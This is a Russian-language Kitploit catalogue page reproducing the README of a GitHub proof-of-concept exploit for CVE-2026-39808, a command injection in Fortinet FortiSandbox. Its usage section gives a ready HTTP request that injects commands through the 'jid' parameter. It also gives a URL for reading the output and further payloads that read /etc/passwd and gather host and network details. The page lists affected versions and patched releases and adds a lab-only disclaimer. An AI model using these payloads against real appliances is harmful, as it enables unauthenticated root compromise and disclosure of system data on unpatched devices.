Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-39808
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationPayload DevelopmentLabs & Practice
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Репозиторий
223 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 FortiSandbox Побег из песочницы с правами root - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Обзор

Этот репозиторий содержит чистое и хорошо документированное подтверждение концепции (Proof of Concept) для CVE-2026-39808 — критической уязвимости неавторизованного внедрения команд в Fortinet FortiSandbox, которая позволяет побег из песочницы и удаленное выполнение кода с правами root (uid=0).

Что демонстрирует этот PoC:

  • Обход пути (Path Traversal) + внедрение команд через параметр jid
  • Побег из песочницы (sandbox breakout) из аналитической среды
  • Выполнение произвольных команд с привилегиями root
  • Чтение системных файлов и информации о сети

📸 Демонстрация

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

Успешная эксплуатация: uid=0 gid=0 groups=0


🚀 Затронутые версии

Диапазон версийСтатус
FortiSandbox 4.4.0 – 4.4.8Уязвима
FortiSandbox 5.0.0 – 5.0.5Уязвима
4.4.9+ / 5.0.6+Исправлено

🛠️ Как использовать (только в лаборатории)

1. Простая полезная нагрузка (рекомендуется)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Просмотр результата

Откройте в браузере:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Примеры продвинутых полезных нагрузок

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Содержимое репозитория

  • poc.py → Автоматический эксплойт на Python
  • burp-request.txt → Готовый к использованию запрос Burp Suite
  • payloads.md → Коллекция полезных нагрузок
  • screenshots/ → Пошаговые изображения эксплуатации
  • README.md → Этот файл

⚠️ Важные замечания

  • Только для образовательных и лабораторных целей
  • НЕ используйте это в производственных или неавторизованных системах
  • Всегда получайте соответствующее разрешение перед тестированием
  • Обновите FortiSandbox до версии 4.4.9+ или 5.0.6+

🛡️ Меры по устранению

Немедленно обновите FortiSandbox до одной из следующих версий:

  • 4.4.9 или выше
  • 5.0.6 или выше

Fortinet выпустил официальные исправления, устраняющие данную уязвимость.


Сделано в исследовательских и образовательных целях
⭐ Поставьте звезду этому репозиторию, если он помог вам!

Скачать инструмент